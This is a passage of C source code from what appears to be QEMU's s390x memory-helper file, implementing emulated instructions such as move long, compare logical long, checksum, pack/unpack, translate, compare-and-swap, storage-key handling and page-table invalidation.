ra); access_memmove(env, &desta, &srca, ra); src = wrap_address(env, src + cur_len); srclen -= cur_len; env->regs[r2 + 1] = deposit64(env->regs[r2 + 1], 0, 24, srclen); set_address_zero(env, r2, src); } dest = wrap_address(env, dest + cur_len); destlen -= cur_len; env->regs[r1 + 1] = deposit64(env->regs[r1 + 1], 0, 24, destlen); set_address_zero(env, r1, dest); /* * MVCL is interruptible. Return to the main loop if requested after * writing back all state to registers. If no interrupt will get * injected, we'll end up back in this handler and continue processing * the remaining parts. */ if (destlen && unlikely(cpu_loop_exit_requested(cs))) { cpu_loop_exit_restore(cs, ra); } } return cc; } /* move long extended */ uint32_t HELPER(mvcle)(CPUS390XState *env, uint32_t r1, uint64_t a2, uint32_t r3) { uintptr_t ra = GETPC(); uint64_t destlen = get_length(env, r1 + 1); uint64_t dest = get_address(env, r1); uint64_t srclen = get_length(env, r3 + 1); uint64_t src = get_address(env, r3); uint8_t pad = a2; uint32_t cc; cc = do_mvcl(env, &dest, &destlen, &src, &srclen, pad, 1, ra); set_length(env, r1 + 1, destlen); set_length(env, r3 + 1, srclen); set_address(env, r1, dest); set_address(env, r3, src); return cc; } /* move long unicode */ uint32_t HELPER(mvclu)(CPUS390XState *env, uint32_t r1, uint64_t a2, uint32_t r3) { uintptr_t ra = GETPC(); uint64_t destlen = get_length(env, r1 + 1); uint64_t dest = get_address(env, r1); uint64_t srclen = get_length(env, r3 + 1); uint64_t src = get_address(env, r3); uint16_t pad = a2; uint32_t cc; cc = do_mvcl(env, &dest, &destlen, &src, &srclen, pad, 2, ra); set_length(env, r1 + 1, destlen); set_length(env, r3 + 1, srclen); set_address(env, r1, dest); set_address(env, r3, src); return cc; } /* compare logical long helper */ static inline uint32_t do_clcl(CPUS390XState *env, uint64_t *src1, uint64_t *src1len, uint64_t *src3, uint64_t *src3len, uint16_t pad, uint64_t limit, int wordsize, uintptr_t ra) { uint64_t len = MAX(*src1len, *src3len); uint32_t cc = 0; check_alignment(env, *src1len | *src3len, wordsize, ra); if (!len) { return cc; } /* Lest we fail to service interrupts in a timely manner, limit the amount of work we're willing to do. */ if (len > limit) { len = limit; cc = 3; } for (; len; len -= wordsize) { uint16_t v1 = pad; uint16_t v3 = pad; if (*src1len) { v1 = cpu_ldusize_data_ra(env, *src1, wordsize, ra); } if (*src3len) { v3 = cpu_ldusize_data_ra(env, *src3, wordsize, ra); } if (v1 != v3) { cc = (v1 < v3) ? 1 : 2; break; } if (*src1len) { *src1 += wordsize; *src1len -= wordsize; } if (*src3len) { *src3 += wordsize; *src3len -= wordsize; } } return cc; } /* compare logical long */ uint32_t HELPER(clcl)(CPUS390XState *env, uint32_t r1, uint32_t r2) { uintptr_t ra = GETPC(); uint64_t src1len = extract64(env->regs[r1 + 1], 0, 24); uint64_t src1 = get_address(env, r1); uint64_t src3len = extract64(env->regs[r2 + 1], 0, 24); uint64_t src3 = get_address(env, r2); uint8_t pad = env->regs[r2 + 1] >> 24; uint32_t cc; cc = do_clcl(env, &src1, &src1len, &src3, &src3len, pad, -1, 1, ra); env->regs[r1 + 1] = deposit64(env->regs[r1 + 1], 0, 24, src1len); env->regs[r2 + 1] = deposit64(env->regs[r2 + 1], 0, 24, src3len); set_address(env, r1, src1); set_address(env, r2, src3); return cc; } /* compare logical long extended memcompare insn with padding */ uint32_t HELPER(clcle)(CPUS390XState *env, uint32_t r1, uint64_t a2, uint32_t r3) { uintptr_t ra = GETPC(); uint64_t src1len = get_length(env, r1 + 1); uint64_t src1 = get_address(env, r1); uint64_t src3len = get_length(env, r3 + 1); uint64_t src3 = get_address(env, r3); uint8_t pad = a2; uint32_t cc; cc = do_clcl(env, &src1, &src1len, &src3, &src3len, pad, 0x2000, 1, ra); set_length(env, r1 + 1, src1len); set_length(env, r3 + 1, src3len); set_address(env, r1, src1); set_address(env, r3, src3); return cc; } /* compare logical long unicode memcompare insn with padding */ uint32_t HELPER(clclu)(CPUS390XState *env, uint32_t r1, uint64_t a2, uint32_t r3) { uintptr_t ra = GETPC(); uint64_t src1len = get_length(env, r1 + 1); uint64_t src1 = get_address(env, r1); uint64_t src3len = get_length(env, r3 + 1); uint64_t src3 = get_address(env, r3); uint16_t pad = a2; uint32_t cc = 0; cc = do_clcl(env, &src1, &src1len, &src3, &src3len, pad, 0x1000, 2, ra); set_length(env, r1 + 1, src1len); set_length(env, r3 + 1, src3len); set_address(env, r1, src1); set_address(env, r3, src3); return cc; } /* checksum */ uint64_t HELPER(cksm)(CPUS390XState *env, uint64_t r1, uint64_t src, uint64_t src_len) { uintptr_t ra = GETPC(); uint64_t max_len, len; uint64_t cksm = (uint32_t)r1; /* Lest we fail to service interrupts in a timely manner, limit the amount of work we're willing to do. For now, let's cap at 8k. */ max_len = (src_len > 0x2000 ? 0x2000 : src_len); /* Process full words as available. */ for (len = 0; len + 4 <= max_len; len += 4, src += 4) { cksm += (uint32_t)cpu_ldl_data_ra(env, src, ra); } switch (max_len - len) { case 1: cksm += cpu_ldub_data_ra(env, src, ra) << 24; len += 1; break; case 2: cksm += cpu_lduw_data_ra(env, src, ra) << 16; len += 2; break; case 3: cksm += cpu_lduw_data_ra(env, src, ra) << 16; cksm += cpu_ldub_data_ra(env, src + 2, ra) << 8; len += 3; break; } /* Fold the carry from the checksum. Note that we can see carry-out during folding more than once (but probably not more than twice). */ while (cksm > 0xffffffffull) { cksm = (uint32_t)cksm + (cksm >> 32); } /* Indicate whether or not we've processed everything. */ env->cc_op = (len == src_len ? 0 : 3); /* Return both cksm and processed length. */ env->retxl = cksm; return len; } void HELPER(pack)(CPUS390XState *env, uint32_t len, uint64_t dest, uint64_t src) { uintptr_t ra = GETPC(); int len_dest = len >> 4; int len_src = len & 0xf; uint8_t b; dest += len_dest; src += len_src; /* last byte is special, it only flips the nibbles */ b = cpu_ldub_data_ra(env, src, ra); cpu_stb_data_ra(env, dest, (b << 4) | (b >> 4), ra); src--; len_src--; /* now pack every value */ while (len_dest > 0) { b = 0; if (len_src >= 0) { b = cpu_ldub_data_ra(env, src, ra) & 0x0f; src--; len_src--; } if (len_src >= 0) { b |= cpu_ldub_data_ra(env, src, ra) << 4; src--; len_src--; } len_dest--; dest--; cpu_stb_data_ra(env, dest, b, ra); } } static inline void do_pkau(CPUS390XState *env, uint64_t dest, uint64_t src, uint32_t srclen, int ssize, uintptr_t ra) { int i; /* The destination operand is always 16 bytes long. */ const int destlen = 16; /* The operands are processed from right to left. */ src += srclen - 1; dest += destlen - 1; for (i = 0; i < destlen; i++) { uint8_t b = 0; /* Start with a positive sign */ if (i == 0) { b = 0xc; } else if (srclen > ssize) { b = cpu_ldub_data_ra(env, src, ra) & 0x0f; src -= ssize; srclen -= ssize; } if (srclen > ssize) { b |= cpu_ldub_data_ra(env, src, ra) << 4; src -= ssize; srclen -= ssize; } cpu_stb_data_ra(env, dest, b, ra); dest--; } } void HELPER(pka)(CPUS390XState *env, uint64_t dest, uint64_t src, uint32_t srclen) { do_pkau(env, dest, src, srclen, 1, GETPC()); } void HELPER(pku)(CPUS390XState *env, uint64_t dest, uint64_t src, uint32_t srclen) { do_pkau(env, dest, src, srclen, 2, GETPC()); } void HELPER(unpk)(CPUS390XState *env, uint32_t len, uint64_t dest, uint64_t src) { uintptr_t ra = GETPC(); int len_dest = len >> 4; int len_src = len & 0xf; uint8_t b; int second_nibble = 0; dest += len_dest; src += len_src; /* last byte is special, it only flips the nibbles */ b = cpu_ldub_data_ra(env, src, ra); cpu_stb_data_ra(env, dest, (b << 4) | (b >> 4), ra); src--; len_src--; /* now pad every nibble with 0xf0 */ while (len_dest > 0) { uint8_t cur_byte = 0; if (len_src > 0) { cur_byte = cpu_ldub_data_ra(env, src, ra); } len_dest--; dest--; /* only advance one nibble at a time */ if (second_nibble) { cur_byte >>= 4; len_src--; src--; } second_nibble = !second_nibble; /* digit */ cur_byte = (cur_byte & 0xf); /* zone bits */ cur_byte |= 0xf0; cpu_stb_data_ra(env, dest, cur_byte, ra); } } static inline uint32_t do_unpkau(CPUS390XState *env, uint64_t dest, uint32_t destlen, int dsize, uint64_t src, uintptr_t ra) { int i; uint32_t cc; uint8_t b; /* The source operand is always 16 bytes long. */ const int srclen = 16; /* The operands are processed from right to left. */ src += srclen - 1; dest += destlen - dsize; /* Check for the sign. */ b = cpu_ldub_data_ra(env, src, ra); src--; switch (b & 0xf) { case 0xa: case 0xc: // case 0xe ... 0xf: case 0xe: case 0xf: cc = 0; /* plus */ break; case 0xb: case 0xd: cc = 1; /* minus */ break; default: // case 0x0 ... 0x9: case 0x0: case 0x1: case 0x2: case 0x3: case 0x4: case 0x5: case 0x6: case 0x7: case 0x8: case 0x9: cc = 3; /* invalid */ break; } /* Now pad every nibble with 0x30, advancing one nibble at a time. */ for (i = 0; i < destlen; i += dsize) { if (i == (31 * dsize)) { /* If length is 32/64 bytes, the leftmost byte is 0. */ b = 0; } else if (i % (2 * dsize)) { b = cpu_ldub_data_ra(env, src, ra); src--; } else { b >>= 4; } cpu_stsize_data_ra(env, dest, 0x30 + (b & 0xf), dsize, ra); dest -= dsize; } return cc; } uint32_t HELPER(unpka)(CPUS390XState *env, uint64_t dest, uint32_t destlen, uint64_t src) { return do_unpkau(env, dest, destlen, 1, src, GETPC()); } uint32_t HELPER(unpku)(CPUS390XState *env, uint64_t dest, uint32_t destlen, uint64_t src) { return do_unpkau(env, dest, destlen, 2, src, GETPC()); } uint32_t HELPER(tp)(CPUS390XState *env, uint64_t dest, uint32_t destlen) { uintptr_t ra = GETPC(); uint32_t cc = 0; int i; for (i = 0; i < destlen; i++) { uint8_t b = cpu_ldub_data_ra(env, dest + i, ra); /* digit */ cc |= (b & 0xf0) > 0x90 ? 2 : 0; if (i == (destlen - 1)) { /* sign */ cc |= (b & 0xf) < 0xa ? 1 : 0; } else { /* digit */ cc |= (b & 0xf) > 0x9 ? 2 : 0; } } return cc; } static uint32_t do_helper_tr(CPUS390XState *env, uint32_t len, uint64_t array, uint64_t trans, uintptr_t ra) { uint32_t i; for (i = 0; i <= len; i++) { uint8_t byte = cpu_ldub_data_ra(env, array + i, ra); uint8_t new_byte = cpu_ldub_data_ra(env, trans + byte, ra); cpu_stb_data_ra(env, array + i, new_byte, ra); } return env->cc_op; } void HELPER(tr)(CPUS390XState *env, uint32_t len, uint64_t array, uint64_t trans) { do_helper_tr(env, len, array, trans, GETPC()); } uint64_t HELPER(tre)(CPUS390XState *env, uint64_t array, uint64_t len, uint64_t trans) { uintptr_t ra = GETPC(); uint8_t end = env->regs[0] & 0xff; uint64_t l = len; uint64_t i; uint32_t cc = 0; if (!(env->psw.mask & PSW_MASK_64)) { array &= 0x7fffffff; l = (uint32_t)l; } /* Lest we fail to service interrupts in a timely manner, limit the amount of work we're willing to do. For now, let's cap at 8k. */ if (l > 0x2000) { l = 0x2000; cc = 3; } for (i = 0; i < l; i++) { uint8_t byte, new_byte; byte = cpu_ldub_data_ra(env, array + i, ra); if (byte == end) { cc = 1; break; } new_byte = cpu_ldub_data_ra(env, trans + byte, ra); cpu_stb_data_ra(env, array + i, new_byte, ra); } env->cc_op = cc; env->retxl = len - i; return array + i; } static inline uint32_t do_helper_trt(CPUS390XState *env, int len, uint64_t array, uint64_t trans, int inc, uintptr_t ra) { int i; for (i = 0; i <= len; i++) { uint8_t byte = cpu_ldub_data_ra(env, array + i * inc, ra); uint8_t sbyte = cpu_ldub_data_ra(env, trans + byte, ra); if (sbyte != 0) { set_address(env, 1, array + i * inc); env->regs[2] = deposit64(env->regs[2], 0, 8, sbyte); return (i == len) ? 2 : 1; } } return 0; } static uint32_t do_helper_trt_fwd(CPUS390XState *env, uint32_t len, uint64_t array, uint64_t trans, uintptr_t ra) { return do_helper_trt(env, len, array, trans, 1, ra); } uint32_t HELPER(trt)(CPUS390XState *env, uint32_t len, uint64_t array, uint64_t trans) { return do_helper_trt(env, len, array, trans, 1, GETPC()); } static uint32_t do_helper_trt_bkwd(CPUS390XState *env, uint32_t len, uint64_t array, uint64_t trans, uintptr_t ra) { return do_helper_trt(env, len, array, trans, -1, ra); } uint32_t HELPER(trtr)(CPUS390XState *env, uint32_t len, uint64_t array, uint64_t trans) { return do_helper_trt(env, len, array, trans, -1, GETPC()); } /* Translate one/two to one/two */ uint32_t HELPER(trXX)(CPUS390XState *env, uint32_t r1, uint32_t r2, uint32_t tst, uint32_t sizes) { uintptr_t ra = GETPC(); int dsize = (sizes & 1) ? 1 : 2; int ssize = (sizes & 2) ? 1 : 2; uint64_t tbl = get_address(env, 1); uint64_t dst = get_address(env, r1); uint64_t len = get_length(env, r1 + 1); uint64_t src = get_address(env, r2); uint32_t cc = 3; int i; /* The lower address bits of TBL are ignored. For TROO, TROT, it's the low 3 bits (double-word aligned). For TRTO, TRTT, it's either the low 12 bits (4K, without ETF2-ENH) or 3 bits (with ETF2-ENH). */ if (ssize == 2 && !s390_has_feat(env->uc, S390_FEAT_ETF2_ENH)) { tbl &= -4096; } else { tbl &= -8; } check_alignment(env, len, ssize, ra); /* Lest we fail to service interrupts in a timely manner, */ /* limit the amount of work we're willing to do. */ for (i = 0; i < 0x2000; i++) { uint16_t sval = cpu_ldusize_data_ra(env, src, ssize, ra); uint64_t tble = tbl + (sval * dsize); uint16_t dval = cpu_ldusize_data_ra(env, tble, dsize, ra); if (dval == tst) { cc = 1; break; } cpu_stsize_data_ra(env, dst, dval, dsize, ra); len -= ssize; src += ssize; dst += dsize; if (len == 0) { cc = 0; break; } } set_address(env, r1, dst); set_length(env, r1 + 1, len); set_address(env, r2, src); return cc; } void HELPER(cdsg)(CPUS390XState *env, uint64_t addr, uint32_t r1, uint32_t r3) { uintptr_t ra = GETPC(); Int128 cmpv = int128_make128(env->regs[r1 + 1], env->regs[r1]); Int128 newv = int128_make128(env->regs[r3 + 1], env->regs[r3]); Int128 oldv; uint64_t oldh, oldl; bool fail; check_alignment(env, addr, 16, ra); oldh = cpu_ldq_data_ra(env, addr + 0, ra); oldl = cpu_ldq_data_ra(env, addr + 8, ra); oldv = int128_make128(oldl, oldh); fail = !int128_eq(oldv, cmpv); if (fail) { newv = oldv; } cpu_stq_data_ra(env, addr + 0, int128_gethi(newv), ra); cpu_stq_data_ra(env, addr + 8, int128_getlo(newv), ra); env->cc_op = fail; env->regs[r1] = int128_gethi(oldv); env->regs[r1 + 1] = int128_getlo(oldv); } void HELPER(cdsg_parallel)(CPUS390XState *env, uint64_t addr, uint32_t r1, uint32_t r3) { uintptr_t ra = GETPC(); Int128 cmpv = int128_make128(env->regs[r1 + 1], env->regs[r1]); Int128 newv = int128_make128(env->regs[r3 + 1], env->regs[r3]); int mem_idx; TCGMemOpIdx oi; Int128 oldv; bool fail; assert(HAVE_CMPXCHG128); mem_idx = cpu_mmu_index(env, false); oi = make_memop_idx(MO_TEQ | MO_ALIGN_16, mem_idx); oldv = helper_atomic_cmpxchgo_be_mmu(env, addr, cmpv, newv, oi, ra); fail = !int128_eq(oldv, cmpv); env->cc_op = fail; env->regs[r1] = int128_gethi(oldv); env->regs[r1 + 1] = int128_getlo(oldv); } static uint32_t do_csst(CPUS390XState *env, uint32_t r3, uint64_t a1, uint64_t a2, bool parallel) { uint32_t mem_idx = cpu_mmu_index(env, false); uintptr_t ra = GETPC(); uint32_t fc = extract32(env->regs[0], 0, 8); uint32_t sc = extract32(env->regs[0], 8, 8); uint64_t pl = get_address(env, 1) & -16; uint64_t svh, svl; uint32_t cc; /* Sanity check the function code and storage characteristic. */ if (fc > 1 || sc > 3) { if (!s390_has_feat(env->uc, S390_FEAT_COMPARE_AND_SWAP_AND_STORE_2)) { goto spec_exception; } if (fc > 2 || sc > 4 || (fc == 2 && (r3 & 1))) { goto spec_exception; } } /* Sanity check the alignments. */ if (extract32(a1, 0, fc + 2) || extract32(a2, 0, sc)) { goto spec_exception; } /* Sanity check writability of the store address. */ probe_write(env, a2, 1 << sc, mem_idx, ra); /* * Note that the compare-and-swap is atomic, and the store is atomic, * but the complete operation is not. Therefore we do not need to * assert serial context in order to implement this. That said, * restart early if we can't support either operation that is supposed * to be atomic. */ if (parallel) { uint32_t max = 2; #ifdef CONFIG_ATOMIC64 max = 3; #endif if ((HAVE_CMPXCHG128 ? 0 : fc + 2 > max) || (HAVE_ATOMIC128 ? 0 : sc > max)) { cpu_loop_exit_atomic(env_cpu(env), ra); } } /* All loads happen before all stores. For simplicity, load the entire store value area from the parameter list. */ svh = cpu_ldq_data_ra(env, pl + 16, ra); svl = cpu_ldq_data_ra(env, pl + 24, ra); switch (fc) { case 0: { uint32_t nv = cpu_ldl_data_ra(env, pl, ra); uint32_t cv = env->regs[r3]; uint32_t ov; if (parallel) { TCGMemOpIdx oi = make_memop_idx(MO_TEUL | MO_ALIGN, mem_idx); ov = helper_atomic_cmpxchgl_be_mmu(env, a1, cv, nv, oi, ra); } else { ov = cpu_ldl_data_ra(env, a1, ra); cpu_stl_data_ra(env, a1, (ov == cv ? nv : ov), ra); } cc = (ov != cv); env->regs[r3] = deposit64(env->regs[r3], 32, 32, ov); } break; case 1: { uint64_t nv = cpu_ldq_data_ra(env, pl, ra); uint64_t cv = env->regs[r3]; uint64_t ov; if (parallel) { #ifdef CONFIG_ATOMIC64 TCGMemOpIdx oi = make_memop_idx(MO_TEQ | MO_ALIGN, mem_idx); ov = helper_atomic_cmpxchgq_be_mmu(env, a1, cv, nv, oi, ra); #else /* Note that we asserted !parallel above. */ g_assert_not_reached(); #endif } else { ov = cpu_ldq_data_ra(env, a1, ra); cpu_stq_data_ra(env, a1, (ov == cv ? nv : ov), ra); } cc = (ov != cv); env->regs[r3] = ov; } break; case 2: { uint64_t nvh = cpu_ldq_data_ra(env, pl, ra); uint64_t nvl = cpu_ldq_data_ra(env, pl + 8, ra); Int128 nv = int128_make128(nvl, nvh); Int128 cv = int128_make128(env->regs[r3 + 1], env->regs[r3]); Int128 ov; if (!parallel) { uint64_t oh = cpu_ldq_data_ra(env, a1 + 0, ra); uint64_t ol = cpu_ldq_data_ra(env, a1 + 8, ra); ov = int128_make128(ol, oh); cc = !int128_eq(ov, cv); if (cc) { nv = ov; } cpu_stq_data_ra(env, a1 + 0, int128_gethi(nv), ra); cpu_stq_data_ra(env, a1 + 8, int128_getlo(nv), ra); } else if (HAVE_CMPXCHG128) { TCGMemOpIdx oi = make_memop_idx(MO_TEQ | MO_ALIGN_16, mem_idx); ov = helper_atomic_cmpxchgo_be_mmu(env, a1, cv, nv, oi, ra); cc = !int128_eq(ov, cv); } else { /* Note that we asserted !parallel above. */ g_assert_not_reached(); } env->regs[r3 + 0] = int128_gethi(ov); env->regs[r3 + 1] = int128_getlo(ov); } break; default: g_assert_not_reached(); } /* Store only if the comparison succeeded. Note that above we use a pair of 64-bit big-endian loads, so for sc < 3 we must extract the value from the most-significant bits of svh. */ if (cc == 0) { switch (sc) { case 0: cpu_stb_data_ra(env, a2, svh >> 56, ra); break; case 1: cpu_stw_data_ra(env, a2, svh >> 48, ra); break; case 2: cpu_stl_data_ra(env, a2, svh >> 32, ra); break; case 3: cpu_stq_data_ra(env, a2, svh, ra); break; case 4: if (!parallel) { cpu_stq_data_ra(env, a2 + 0, svh, ra); cpu_stq_data_ra(env, a2 + 8, svl, ra); } else if (HAVE_ATOMIC128) { TCGMemOpIdx oi = make_memop_idx(MO_TEQ | MO_ALIGN_16, mem_idx); Int128 sv = int128_make128(svl, svh); helper_atomic_sto_be_mmu(env, a2, sv, oi, ra); } else { /* Note that we asserted !parallel above. */ g_assert_not_reached(); } break; default: g_assert_not_reached(); } } return cc; spec_exception: tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra); } uint32_t HELPER(csst)(CPUS390XState *env, uint32_t r3, uint64_t a1, uint64_t a2) { return do_csst(env, r3, a1, a2, false); } uint32_t HELPER(csst_parallel)(CPUS390XState *env, uint32_t r3, uint64_t a1, uint64_t a2) { return do_csst(env, r3, a1, a2, true); } void HELPER(lctlg)(CPUS390XState *env, uint32_t r1, uint64_t a2, uint32_t r3) { uintptr_t ra = GETPC(); bool PERchanged = false; uint64_t src = a2; uint32_t i; if (src & 0x7) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra); } for (i = r1;; i = (i + 1) % 16) { uint64_t val = cpu_ldq_data_ra(env, src, ra); if (env->cregs[i] != val && i >= 9 && i <= 11) { PERchanged = true; } env->cregs[i] = val; HELPER_LOG("load ctl %d from 0x%" PRIx64 " == 0x%" PRIx64 "\n", i, src, val); src += sizeof(uint64_t); if (i == r3) { break; } } if (PERchanged && env->psw.mask & PSW_MASK_PER) { s390_cpu_recompute_watchpoints(env_cpu(env)); } tlb_flush(env_cpu(env)); } void HELPER(lctl)(CPUS390XState *env, uint32_t r1, uint64_t a2, uint32_t r3) { uintptr_t ra = GETPC(); bool PERchanged = false; uint64_t src = a2; uint32_t i; if (src & 0x3) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra); } for (i = r1;; i = (i + 1) % 16) { uint32_t val = cpu_ldl_data_ra(env, src, ra); if ((uint32_t)env->cregs[i] != val && i >= 9 && i <= 11) { PERchanged = true; } env->cregs[i] = deposit64(env->cregs[i], 0, 32, val); HELPER_LOG("load ctl %d from 0x%" PRIx64 " == 0x%x\n", i, src, val); src += sizeof(uint32_t); if (i == r3) { break; } } if (PERchanged && env->psw.mask & PSW_MASK_PER) { s390_cpu_recompute_watchpoints(env_cpu(env)); } tlb_flush(env_cpu(env)); } void HELPER(stctg)(CPUS390XState *env, uint32_t r1, uint64_t a2, uint32_t r3) { uintptr_t ra = GETPC(); uint64_t dest = a2; uint32_t i; if (dest & 0x7) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra); } for (i = r1;; i = (i + 1) % 16) { cpu_stq_data_ra(env, dest, env->cregs[i], ra); dest += sizeof(uint64_t); if (i == r3) { break; } } } void HELPER(stctl)(CPUS390XState *env, uint32_t r1, uint64_t a2, uint32_t r3) { uintptr_t ra = GETPC(); uint64_t dest = a2; uint32_t i; if (dest & 0x3) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra); } for (i = r1;; i = (i + 1) % 16) { cpu_stl_data_ra(env, dest, env->cregs[i], ra); dest += sizeof(uint32_t); if (i == r3) { break; } } } uint32_t HELPER(testblock)(CPUS390XState *env, uint64_t real_addr) { uintptr_t ra = GETPC(); int i; real_addr = wrap_address(env, real_addr) & TARGET_PAGE_MASK; for (i = 0; i < TARGET_PAGE_SIZE; i += 8) { cpu_stq_mmuidx_ra(env, real_addr + i, 0, MMU_REAL_IDX, ra); } return 0; } uint32_t HELPER(tprot)(CPUS390XState *env, uint64_t a1, uint64_t a2) { S390CPU *cpu = env_archcpu(env); CPUState *cs = env_cpu(env); /* * TODO: we currently don't handle all access protection types * (including access-list and key-controlled) as well as AR mode. */ if (!s390_cpu_virt_mem_check_write(cpu, a1, 0, 1)) { /* Fetching permitted; storing permitted */ return 0; } if (env->int_pgm_code == PGM_PROTECTION) { /* retry if reading is possible */ cs->exception_index = -1; if (!s390_cpu_virt_mem_check_read(cpu, a1, 0, 1)) { /* Fetching permitted; storing not permitted */ return 1; } } switch (env->int_pgm_code) { case PGM_PROTECTION: /* Fetching not permitted; storing not permitted */ cs->exception_index = -1; return 2; case PGM_ADDRESSING: case PGM_TRANS_SPEC: /* exceptions forwarded to the guest */ s390_cpu_virt_mem_handle_exc(cpu, GETPC()); return 0; } /* Translation not available */ cs->exception_index = -1; return 3; } /* insert storage key extended */ uint64_t HELPER(iske)(CPUS390XState *env, uint64_t r2) { S390SKeysState *ss = (S390SKeysState *)(&((S390CPU *)env->uc->cpu)->ss); S390SKeysClass *skeyclass = S390_SKEYS_GET_CLASS(ss); uint64_t addr = wrap_address(env, r2); uint8_t key; #if 0 if (addr > ram_size) { return 0; } #endif if (skeyclass->get_skeys(ss, addr / TARGET_PAGE_SIZE, 1, &key)) { return 0; } return key; } /* set storage key extended */ void HELPER(sske)(CPUS390XState *env, uint64_t r1, uint64_t r2) { S390SKeysState *ss = (S390SKeysState *)(&((S390CPU *)env->uc->cpu)->ss); S390SKeysClass *skeyclass = S390_SKEYS_GET_CLASS(ss); uint64_t addr = wrap_address(env, r2); uint8_t key; #if 0 if (addr > ram_size) { return; } #endif key = (uint8_t) r1; skeyclass->set_skeys(ss, addr / TARGET_PAGE_SIZE, 1, &key); /* * As we can only flush by virtual address and not all the entries * that point to a physical address we have to flush the whole TLB. */ tlb_flush_all_cpus_synced(env_cpu(env)); } /* reset reference bit extended */ uint32_t HELPER(rrbe)(CPUS390XState *env, uint64_t r2) { S390SKeysState *ss = (S390SKeysState *)(&((S390CPU *)env->uc->cpu)->ss); S390SKeysClass *skeyclass = S390_SKEYS_GET_CLASS(ss); uint8_t re, key; #if 0 if (r2 > ram_size) { return 0; } #endif if (skeyclass->get_skeys(ss, r2 / TARGET_PAGE_SIZE, 1, &key)) { return 0; } re = key & (SK_R | SK_C); key &= ~SK_R; if (skeyclass->set_skeys(ss, r2 / TARGET_PAGE_SIZE, 1, &key)) { return 0; } /* * As we can only flush by virtual address and not all the entries * that point to a physical address we have to flush the whole TLB. */ tlb_flush_all_cpus_synced(env_cpu(env)); /* * cc * * 0 Reference bit zero; change bit zero * 1 Reference bit zero; change bit one * 2 Reference bit one; change bit zero * 3 Reference bit one; change bit one */ return re >> 1; } uint32_t HELPER(mvcs)(CPUS390XState *env, uint64_t l, uint64_t a1, uint64_t a2) { const uint8_t psw_as = (env->psw.mask & PSW_MASK_ASC) >> PSW_SHIFT_ASC; S390Access srca, desta; uintptr_t ra = GETPC(); int cc = 0; HELPER_LOG("%s: %16" PRIx64 " %16" PRIx64 " %16" PRIx64 "\n", __func__, l, a1, a2); if (!(env->psw.mask & PSW_MASK_DAT) || !(env->cregs[0] & CR0_SECONDARY) || psw_as == AS_HOME || psw_as == AS_ACCREG) { s390_program_interrupt(env, PGM_SPECIAL_OP, ra); } l = wrap_length32(env, l); if (l > 256) { /* max 256 */ l = 256; cc = 3; } else if (!l) { return cc; } /* TODO: Access key handling */ srca = access_prepare(env, a2, l, MMU_DATA_LOAD, MMU_PRIMARY_IDX, ra); desta = access_prepare(env, a1, l, MMU_DATA_STORE, MMU_SECONDARY_IDX, ra); access_memmove(env, &desta, &srca, ra); return cc; } uint32_t HELPER(mvcp)(CPUS390XState *env, uint64_t l, uint64_t a1, uint64_t a2) { const uint8_t psw_as = (env->psw.mask & PSW_MASK_ASC) >> PSW_SHIFT_ASC; S390Access srca, desta; uintptr_t ra = GETPC(); int cc = 0; HELPER_LOG("%s: %16" PRIx64 " %16" PRIx64 " %16" PRIx64 "\n", __func__, l, a1, a2); if (!(env->psw.mask & PSW_MASK_DAT) || !(env->cregs[0] & CR0_SECONDARY) || psw_as == AS_HOME || psw_as == AS_ACCREG) { s390_program_interrupt(env, PGM_SPECIAL_OP, ra); } l = wrap_length32(env, l); if (l > 256) { /* max 256 */ l = 256; cc = 3; } else if (!l) { return cc; } /* TODO: Access key handling */ srca = access_prepare(env, a2, l, MMU_DATA_LOAD, MMU_SECONDARY_IDX, ra); desta = access_prepare(env, a1, l, MMU_DATA_STORE, MMU_PRIMARY_IDX, ra); access_memmove(env, &desta, &srca, ra); return cc; } void HELPER(idte)(CPUS390XState *env, uint64_t r1, uint64_t r2, uint32_t m4) { CPUState *cs = env_cpu(env); const uintptr_t ra = GETPC(); uint64_t table, entry, raddr; uint16_t entries, i, index = 0; if (r2 & 0xff000) { tcg_s390_program_interrupt(env, PGM_SPECIFICATION, ra); } if (!(r2 & 0x800)) { /* invalidation-and-clearing operation */ table = r1 & ASCE_ORIGIN; entries = (r2 & 0x7ff) + 1; switch (r1 & ASCE_TYPE_MASK) { case ASCE_TYPE_REGION1: index = (r2 >> 53) & 0x7ff; break; case ASCE_TYPE_REGION2: index = (r2 >> 42) & 0x7ff; break; case ASCE_TYPE_REGION3: index = (r2 >> 31) & 0x7ff; break; case ASCE_TYPE_SEGMENT: index = (r2 >> 20) & 0x7ff; break; } for (i = 0; i < entries; i++) { /* addresses are not wrapped in 24/31bit mode but table index is */ raddr = table + ((index + i) & 0x7ff) * sizeof(entry); entry = cpu_ldq_mmuidx_ra(env, raddr, MMU_REAL_IDX, ra); if (!(entry & REGION_ENTRY_I)) { /* we are allowed to not store if already invalid */ entry |= REGION_ENTRY_I; cpu_stq_mmuidx_ra(env, raddr, entry, MMU_REAL_IDX, ra); } } } /* We simply flush the complete tlb, therefore we can ignore r3. */ if (m4 & 1) { tlb_flush(cs); } else { tlb_flush_all_cpus_synced(cs); } } /* invalidate pte */ void HELPER(ipte)(CPUS390XState *env, uint64_t pto, uint64_t vaddr, uint32_t m4) { CPUState *cs = env_cpu(env); const uintptr_t ra = GETPC(); uint64_t page = vaddr & TARGET_PAGE_MASK; uint64_t pte_addr, pte; /* Compute the page table entry address */ pte_addr = (pto & SEGMENT_ENTRY_ORIGIN); pte_addr += VADDR_PAGE_TX(vaddr) * 8; /* Mark the page table entry as invalid */ pte = cpu_ldq_mmuidx_ra(env, pte_addr, MMU_REAL_IDX, ra); pte |= PAGE_ENTRY_I; cpu_stq_mmuidx_ra(env, pte_addr, pte, MMU_REAL_IDX, ra); /* XXX we exploit the fact that Linux passes the exact virtual address here - it's not obliged to! */ if (m4 & 1) { if (vaddr & ~VADDR_PAGE_TX_MASK) { tlb_flush_page(cs, page); /* XXX 31-bit hack */ tlb_flush_page(cs, page ^ 0x80000000); } else { /* looks like we don't have a valid virtual address */ tlb_flush(cs); } } else { if (vaddr & ~VADDR_PAGE_TX_MASK) { tlb_flush_page_all_cpus_synced(cs, page); /* XXX 31-bit hack */ tlb_flush_page_all_cpus_synced(cs, page ^ 0x80000000); } else { /* looks like we don't have a valid virtual address */ tlb_flush_all_cpus_synced(cs); } } } /* flush local tlb */ 